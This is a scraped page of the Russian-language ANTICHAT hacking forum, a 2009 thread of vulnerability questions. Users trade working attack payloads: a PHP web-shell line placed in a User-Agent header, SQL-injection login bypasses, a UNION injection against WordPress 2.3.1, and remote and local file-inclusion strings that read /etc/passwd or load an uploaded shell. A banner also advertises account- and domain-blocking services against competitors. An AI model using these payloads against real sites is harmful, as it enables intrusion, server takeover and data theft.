УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 736 из 2438

736

Опции темы

Поиск в этой теме

Опции просмотра

#7351

25.05.2009, 17:22

PaCo

Постоянный

Регистрация: 06.02.2008

Сообщений: 494

Провел на форуме:
1754802

Репутация: 380

для начало почитай здесь - http://www.phpclub.ru/mysql/doc/insert.html

потом неспеша сюда переходи- http://forum.antichat.ru/thread119047.html
вопросы должны отпасть.

#7352

25.05.2009, 18:07

~~[ReV]OLVeR~~

Banned

Регистрация: 20.05.2009

Сообщений: 1

Провел на форуме:
2342

Репутация: 0

Помогите разобратся вот с этим.
http://forum.antichat.ru/threadnav49775-2-10.html

как понять эту строчьку ?
User-Agent: <?php passthru($_GET['cmd']) ?>
C помощью чего её передать?
Ясно что post запросом но при помощи чего ??

Последний раз редактировалось [ReV]OLVeR; 25.05.2009 в 18:15..

#7353

25.05.2009, 18:14

mailbrush

Познавший АНТИЧАТ

Регистрация: 24.06.2008

Сообщений: 1,996

Провел на форуме:
6075534

Репутация: 2731

Отправить сообщение для mailbrush с помощью ICQ

Этой коммандой ты можешь исполнять системные комманды, используя параметр $_GET['cmd'], т.е. http://site.com/script.php?cmd=help. Передать с помощью программы, отсылающей сокеты, н.п. InetCrack.

#7354

25.05.2009, 19:46

_Quest_

Новичок

Регистрация: 21.05.2009

Сообщений: 11

Провел на форуме:
59923

Репутация: 65

При входе в панэль администратирования задаю зачение:
login:'
Pass:'

в ответ:

Код:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1

' or 1=1/*

возврощает ответ:

Неверный пароль!

В принципе подобра что есть 4 колонки но скуля блайнд.
Что можно придумать с авторизацией?

PS :jokester c заливкой через ../../proc/self/fd/2%00 почемуто не канает(.

Последний раз редактировалось _Quest_; 25.05.2009 в 19:51..

#7355

26.05.2009, 16:09

mak-shapova

Новичок

Регистрация: 11.01.2009

Сообщений: 15

Провел на форуме:
8148

Репутация: 13

пытаюсь заюзать багу в wordpress 2.3.1
http://site.com/bloggi/?feed=rss2&p=11/**/union/**/select/**/1,2/**/+--+
в ответ ошибка

Цитата:

WordPress database error: [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND comment_approved = '1' ORDER BY comment_date_gmt DESC LIMIT 10' at line 1]
SELECT wp_comments.* FROM wp_comments WHERE comment_post_ID = AND comment_approved = '1' ORDER BY comment_date_gmt DESC LIMIT 10

че делать?

#7356

26.05.2009, 22:11

PaCo

Постоянный

Регистрация: 06.02.2008

Сообщений: 494

Провел на форуме:
1754802

Репутация: 380

смотри на запрос:
SELECT wp_comments.* FROM wp_comments WHERE comment_post_ID = AND comment_approved = '1' ORDER BY comment_date_gmt DESC LIMIT 10

из него же видно что comment_post_ID = идет сравнения но ничего не вставляеться в запрос т.к. твой данные не прошли фильтр.

#7357

27.05.2009, 09:46

Byrger

Постоянный

Регистрация: 07.03.2008

Сообщений: 479

Провел на форуме:
791766

Репутация: 61

Подскажите есть ли уязвимость в этом скрипте подгрузки?
Если да, то как можно использовать для PHP-inj

PHP код:


		
			
if (!IsSet($t)&!IsSet($f))

    {

    $f="main";

    $filename=$f . ".php";

    }

    else

        {

        if (IsSet($t)&!IsSet($f))

            {

            $filename=$t . "/index.php";

            }

        if (IsSet($t)&IsSet($f))

            {

            $filename= $t . "/" . $f . ".php";

            }

        if (!IsSet($t)&IsSet($f))

            {

            $filename=$f . ".php";

            }

        }





if (file_exists("$filename"))

{ include("$filename"); }

else

{ echo " <div class=\"alert\"> Ошибка 404, Страница не найдена. </div>"; }

#7358

27.05.2009, 09:53

Shaitan-Devil

Участник форума

Регистрация: 15.08.2008

Сообщений: 167

Провел на форуме:
3009843

Репутация: 204

Есть phpmyadmin и юзер с полными правами. Пытаюсь залить шелл в разные директории пишет:"Can't create a file...", но успешно создает при попытке залить в /tmp/. Что можно сделать в этой ситуации?

#7359

27.05.2009, 10:01

Pashkela

Динозавр

Регистрация: 10.01.2008

Сообщений: 2,841

Провел на форуме:
9220514

Репутация: 3338

Отправить сообщение для Pashkela с помощью ICQ

2 Shaitan-Devil:

искать директорию на запись, например сканером сайта на папки

#7360

27.05.2009, 10:07

Iceangel_

Постоянный

Регистрация: 09.07.2006

Сообщений: 553

Провел на форуме:
7561206

Репутация: 1861

2 Byrger
[RFI]
заливаешь на фтп шел с именем index.php

Цитата:

?t=ftp://login: password@site.com

или шелл с любым именем, но без расширения

Цитата:

?f=ftp://login: password@site.com/shell

[LFI]

Цитата:

?t=../../../../../../../../etc/passwd%00

Цитата:

?f=../../../../../../../../etc/passwd%00

2 Shaitan-Devil
можешь посмотреть сайты по реверс айпи на присутствие локального инклуда, и потом инклуднуть записанный в /tmp шелл

Последний раз редактировалось Iceangel_; 27.05.2009 в 10:09..

Страница 736 из 2438

736

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)

Быстрый переход